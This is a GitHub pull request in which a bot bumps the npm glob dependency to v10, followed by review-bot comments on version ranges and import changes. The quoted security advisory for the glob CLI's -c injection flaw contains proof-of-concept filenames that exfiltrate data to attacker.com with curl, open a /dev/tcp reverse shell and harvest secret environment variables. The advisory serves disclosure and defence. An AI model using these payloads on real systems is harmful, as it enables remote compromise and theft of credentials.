
fix(deps): update dependency glob to v10 [security]#382

Draft
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-glob-vulnerability

Conversation


@renovate renovate Bot commented Apr 15, 2026

This PR contains the following updates:

Package   Change
glob      ^7.1.2 -> ^10.0.0
glob      ^9.3.5 -> ^10.0.0

glob CLI: Command injection via -c/--cmd executes matches with shell:true

CVE-2025-64756 / GHSA-5j98-mcp5-4vw2


Summary

The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.

Details

Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:

stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

Technical Flow:

  1. User runs glob -c <command> <pattern>
  2. CLI finds files matching the pattern
  3. Matched filenames are collected into an array
  4. Command is executed with matched filenames as arguments using shell: true
  5. Shell interprets metacharacters in filenames as command syntax
  6. Malicious filenames execute arbitrary commands

Affected Component:

  • CLI Only: The vulnerability affects only the command-line interface
  • Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
  • Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)

Attack Surface:

  • Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
  • Any directory where attackers can control filenames (PR branches, archives, user uploads)
  • CI/CD pipelines using glob -c on untrusted content

PoC

Setup Malicious File:

mkdir test_directory && cd test_directory

# Create file with command injection payload in filename
touch '$(touch injected_poc)'

Trigger Vulnerability:

# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"

Result:

  • The echo command executes normally
  • Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
  • A new file injected_poc is created, proving command execution
  • Any command can be injected this way with full user privileges

Advanced Payload Examples:

Data Exfiltration:

# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

Reverse Shell:

# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

Environment Variable Harvesting:

# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

Impact

Arbitrary Command Execution:

  • Commands execute with full privileges of the user running glob CLI
  • No privilege escalation required - runs as current user
  • Access to environment variables, file system, and network

Real-World Attack Scenarios:

1. CI/CD Pipeline Compromise:

  • Malicious PR adds files with crafted names to repository
  • CI pipeline uses glob -c to process files (linting, testing, deployment)
  • Commands execute in CI environment with build secrets and deployment credentials
  • Potential for supply chain compromise through artifact tampering

2. Developer Workstation Attack:

  • Developer clones repository or extracts archive containing malicious filenames
  • Local build scripts use glob -c for file processing
  • Developer machine compromise with access to SSH keys, tokens, local services

3. Automated Processing Systems:

  • Services using glob CLI to process uploaded files or external content
  • File uploads with malicious names trigger command execution
  • Server-side compromise with potential for lateral movement

4. Supply Chain Poisoning:

  • Malicious packages or themes include files with crafted names
  • Build processes using glob CLI automatically process these files
  • Wide distribution of compromise through package ecosystems

Platform-Specific Risks:

  • POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
  • Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
  • Mixed Environments: CI systems often use Linux containers regardless of developer platform

Affected Products
  • Ecosystem: npm
  • Package name: glob
  • Component: CLI only (src/bin.mts)
  • Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
  • Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
  • Patched versions: 11.1.0 and 10.5.0

Scope Limitation:

  • Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
  • CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable

Remediation
  • Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
  • If any glob CLI actions fail, convert commands containing positional arguments to use the --cmd-arg/-g option instead.
  • As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

isaacs/node-glob (glob)

v10.5.0, v10.4.5, v10.4.4, v10.4.3, v10.4.2, v10.4.1, v10.4.0, v10.3.16, v10.3.15, v10.3.14, v10.3.13, v10.3.12, v10.3.11, v10.3.10, v10.3.9, v10.3.8, v10.3.7, v10.3.6, v10.3.5, v10.3.4, v10.3.3, v10.3.2, v10.3.1, v10.3.0, v10.2.7, v10.2.6, v10.2.5, v10.2.4, v10.2.3, v10.2.2, v10.2.1, v10.2.0, v10.1.0 (Compare Source link only, no release notes)

v10.0.0

  • No default exports, only named exports

v9.3.5, v9.3.4 (Compare Source link only, no release notes)

v9.3.3

  • Upgraded minimatch to v8, adding support for any degree of
    nested extglob patterns.

v9.3.2, v9.3.1, v9.3.0, v9.2.1, v9.2.0, v9.1.2, v9.1.1, v9.1.0, v9.0.2, v9.0.1, v9.0.0, v8.1.0, v8.0.3, v8.0.2, v8.0.1 (Compare Source link only, no release notes)


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the renovate label Apr 15, 2026

coderabbitai Bot commented Apr 15, 2026

📝 Walkthrough

Two glob package entries were updated: the root package.json dependency was bumped from ^9.3.5 to ^10.0.0, and src/test/vscode-notebook-perf/package.json devDependency was bumped from ^7.1.2 to ^10.0.0. No other files or code changes are present.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~8 minutes

🚥 Pre-merge checks: 6 passed

  • Title check: Passed. The title accurately summarizes the main change: upgrading the glob dependency to v10 for security reasons, matching the actual dependency updates in both package.json files.
  • Docstring Coverage: Passed. No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
  • Linked Issues check: Passed. Check skipped because no linked issues were found for this pull request.
  • Out of Scope Changes check: Passed. Check skipped because no linked issues were found for this pull request.
  • Updates Docs: Passed. Security patch updating glob dependency to address CVE-2025-64756. Version bumps in package.json with no new functionality.
  • Description Check: Passed. Check skipped - CodeRabbit's high-level summary is enabled.





codecov Bot commented Apr 15, 2026

⚠️ JUnit XML file not found

The CLI was unable to find any JUnit XML files to upload.
For more help, visit our troubleshooting guide.


@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 1

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
src/test/vscode-notebook-perf/package.json (1)

29-35: 🛠️ Refactor suggestion | 🟠 Major

Type definitions may be stale. glob v10+ ships its own TypeScript definitions, so @types/glob is no longer needed. Remove @types/glob from devDependencies.

Proposed fix
 "devDependencies": {
-    "@types/glob": "^5.0.35",
     "@types/mocha": "^9.1.0",
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@src/test/vscode-notebook-perf/package.json` around lines 29 - 35, Remove the
now-unnecessary "@types/glob" devDependency from package.json (it is listed
alongside other devDependencies like "@types/mocha", "@types/node", "glob" and
"@vscode/test-cli"); delete the "@types/glob" entry, then update your lockfile
by running your package manager install (npm/yarn/pnpm) so the dependency tree
and lockfile are consistent.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@package.json`:
- Line 2710: Update the import and call sites to the new named export: replace
the default import "import glob from 'glob'" with "import { globSync } from
'glob'" and replace all uses of "glob.sync(...)" with direct calls to
"globSync(...)" in the three affected modules (gulpfile.js where glob is used
around the task that reads files, build/webTestReporter.js around the reporter
file-globbing logic, and build/webpack/common.js in the config file-glob usage).
Ensure you only import the named symbol globSync and update every glob.sync
invocation in those files to globSync with identical arguments.



📥 Commits

Reviewing files that changed from the base of the PR and between 9ca0182 and db7e18e.

⛔ Files ignored due to path filters (2)
  • package-lock.json is excluded by !**/package-lock.json
  • src/test/vscode-notebook-perf/package-lock.json is excluded by !**/package-lock.json
📒 Files selected for processing (2)
  • package.json
  • src/test/vscode-notebook-perf/package.json

@renovate renovate Bot changed the title fix(deps): update dependency glob to v10 [security] fix(deps): update dependency glob to v10 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot deleted the renovate/npm-glob-vulnerability branch April 27, 2026 17:38
@renovate renovate Bot changed the title fix(deps): update dependency glob to v10 [security] - autoclosed fix(deps): update dependency glob to v10 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/npm-glob-vulnerability branch 2 times, most recently from db7e18e to 4360ae5 Compare April 27, 2026 21:29

@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@package.json`:
- Line 2710: Update the declared dependency range for glob to require the safe
minimum by changing the version string from "^10.0.0" to "^10.5.0" (the
dependency key "glob" in package.json), then regenerate the lockfile (run your
package manager install) so the lockfile pins a non-vulnerable 10.5.x+ release
and run CI/tests to verify nothing breaks.

In `@src/test/vscode-notebook-perf/package.json`:
- Line 35: Update the glob dependency version constraint in package.json from
"^10.0.0" to "^10.5.0" to exclude vulnerable 10.2.0–10.4.x releases; after
changing the "glob" entry, regenerate the lockfile (npm install / yarn install),
run the test suite and dependency audit (npm audit or yarn audit) to ensure no
regressions, and commit the updated lockfile alongside the package.json change.


📥 Commits

Reviewing files that changed from the base of the PR and between db7e18e and 4360ae5.

⛔ Files ignored due to path filters (2)
  • package-lock.json is excluded by !**/package-lock.json
  • src/test/vscode-notebook-perf/package-lock.json is excluded by !**/package-lock.json
📒 Files selected for processing (2)
  • package.json
  • src/test/vscode-notebook-perf/package.json

Comment thread package.json
"format-util": "^1.0.5",
"fs-extra": "^4.0.3",
"glob": "^9.3.5",
"glob": "^10.0.0",
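Review bot: the new range "^10.0.0" still admits the vulnerable CLI releases the advisory above lists (v10.2.0 through v10.4.x); the fix only lands in 10.5.0, so declare "^10.5.0" here so that a lockfile regeneration cannot resolve back into the vulnerable range. The bump from ^9.3.5 also crosses the v10.0.0 release note "No default exports, only named exports", and the walkthrough states that no files other than the two manifests changed, so confirm every `import glob from 'glob'` / `glob.sync(...)` call site (gulpfile.js, build/webTestReporter.js and build/webpack/common.js are named in the earlier review prompt) has been migrated to `import { globSync } from 'glob'` before this merges.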


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "== Declared glob ranges in changed manifests =="
rg -n '"glob"\s*:\s*"\^10\.[0-9]+\.[0-9]+"' package.json src/test/vscode-notebook-perf/package.json

echo
echo "== Resolved glob versions from lockfiles (if present) =="
for lock in package-lock.json npm-shrinkwrap.json pnpm-lock.yaml yarn.lock; do
  if [ -f "$lock" ]; then
    echo "--- $lock ---"
    rg -n 'glob|10\.[0-9]+\.[0-9]+' "$lock" | head -n 120
  fi
done

Repository: deepnote/vscode-deepnote

Length of output: 6897


🏁 Script executed:

#!/bin/bash
# Find the main glob dependency entry and its resolved version
rg -A 5 'node_modules/glob"\s*:' package-lock.json | head -20

Repository: deepnote/vscode-deepnote

Length of output: 1274


🌐 Web query:

CVE-2025-64756 GHSA-5j98-mcp5-4vw2 glob security vulnerability

💡 Result:

CVE-2025-64756 (GHSA-5j98-mcp5-4vw2) is a high-severity command injection vulnerability in the CLI of the npm glob package, affecting versions >=10.2.0 <10.5.0 and >=11.0.0 <11.1.0. It allows arbitrary command execution when using the -c/--cmd option on files with malicious shell metacharacters in names, as filenames are passed to a shell with shell: true. The core library API (glob, globSync) is unaffected. Patched in 10.5.0 and 11.1.0. CVSS 3.1: 7.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H). Published November 17, 2025.



🏁 Script executed:

#!/bin/bash
# Find the root-level glob node_modules entry
rg -B 2 -A 10 '"node_modules/glob"' package-lock.json | grep -A 10 '"node_modules/glob":' | head -20

Repository: deepnote/vscode-deepnote

Length of output: 850


Tighten glob minimum to prevent vulnerable range.

The declared range "^10.0.0" permits versions 10.2.0–10.4.x, which are vulnerable to CVE-2025-64756 (CLI command injection via --cmd flag). The lockfile currently resolves to 10.5.0 (safe), but the loose range could reintroduce vulnerability on lockfile regeneration. Update to "^10.5.0" to enforce the safe minimum.

Suggested diff
-        "glob": "^10.0.0",
+        "glob": "^10.5.0",
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@package.json` at line 2710, Update the declared dependency range for glob to
require the safe minimum by changing the version string from "^10.0.0" to
"^10.5.0" (the dependency key "glob" in package.json), then regenerate the
lockfile (run your package manager install) so the lockfile pins a
non-vulnerable 10.5.x+ release and run CI/tests to verify nothing breaks.

"@vscode/test-cli": "^0.0.8",
"@vscode/test-electron": "^2.5.2",
"glob": "^7.1.2",
"glob": "^10.0.0",
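Review bot: same point as for the root manifest: "^10.0.0" admits 10.2.0 through 10.4.x, which carry the -c/--cmd injection, so require "^10.5.0". This jump from ^7.1.2 also crosses three major versions, and the earlier outside-diff comment notes that "@types/glob": "^5.0.35" is still declared in this devDependencies block even though glob v10 ships its own TypeScript definitions; drop it in the same change and regenerate the lockfile so the two stay consistent.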


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

# Find the root package.json and other package.json files to understand the context
find . -name "package.json" -type f | head -20

Repository: deepnote/vscode-deepnote

Length of output: 181


🏁 Script executed:

# Check the root package.json for glob dependency
cat package.json | grep -A 2 -B 2 '"glob"'

Repository: deepnote/vscode-deepnote

Length of output: 218


🏁 Script executed:

# View the specific test package.json file mentioned
cat -n src/test/vscode-notebook-perf/package.json | grep -A 2 -B 2 "glob"

Repository: deepnote/vscode-deepnote

Length of output: 423


🌐 Web query:

glob npm package security vulnerability version 10.0 10.2 10.4 10.5

💡 Result:

The npm package "glob" has a critical command injection vulnerability (CVE-2025-64756, GHSA-5j98-mcp5-4vw2) in its CLI tool when using the -c/--cmd option. This affects versions >=10.2.0 <10.5.0 (including 10.2.x, 10.4.x) and >=11.0.0 <11.1.0. Version 10.0.x is not affected as the vulnerable CLI feature was introduced in 10.2.0. Version 10.5.0 includes the backported fix. Vulnerability details: Matched filenames are passed to a shell with shell: true, allowing shell metacharacters in untrusted filenames (e.g., $(command)) to execute arbitrary code with user privileges. Only CLI usage is affected; the library API (glob, globSync) is safe. Fix: Upgrade to glob@10.5.0 or later (e.g., 11.1.0, 12.0.0+). New safe options: --cmd-arg/-g for positional args, --shell (deprecated, unsafe if paths untrusted). As of 2026-04-27, latest version is 13.0.6 (no known vulnerabilities).



🌐 Web query:

glob npm CVE vulnerability 10.5.0 patch release

💡 Result:

The npm glob package released version 10.5.0 as a patch for CVE-2025-64756, a critical command injection vulnerability in the glob CLI tool. The vulnerability affects the -c/--cmd option, where matched filenames are passed to a shell with shell: true, allowing arbitrary command execution via malicious filenames containing shell metacharacters. Affected versions are approximately >=10.2.0 <10.5.0 and >=11.0.0 <11.1.0 (minor variations in reports, e.g., some cite >=10.3.7). The issue is specific to CLI usage and does not affect the library API. Version 10.5.0 backports the fix from the main branch, adding safer options like --cmd-arg/-g and --shell (deprecated). Update via npm install glob@10.5.0 or higher.



Upgrade to ^10.5.0 to exclude glob CLI vulnerability CVE-2025-64756.

Versions 10.2.0–10.4.x have a critical command injection vulnerability in the -c/--cmd CLI option. The ^10.0.0 constraint allows these vulnerable versions if lockfile regeneration occurs. Update to ^10.5.0.

Suggested diff
-    "glob": "^10.0.0",
+    "glob": "^10.5.0",
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@src/test/vscode-notebook-perf/package.json` at line 35, Update the glob
dependency version constraint in package.json from "^10.0.0" to "^10.5.0" to
exclude vulnerable 10.2.0–10.4.x releases; after changing the "glob" entry,
regenerate the lockfile (npm install / yarn install), run the test suite and
dependency audit (npm audit or yarn audit) to ensure no regressions, and commit
the updated lockfile alongside the package.json change.
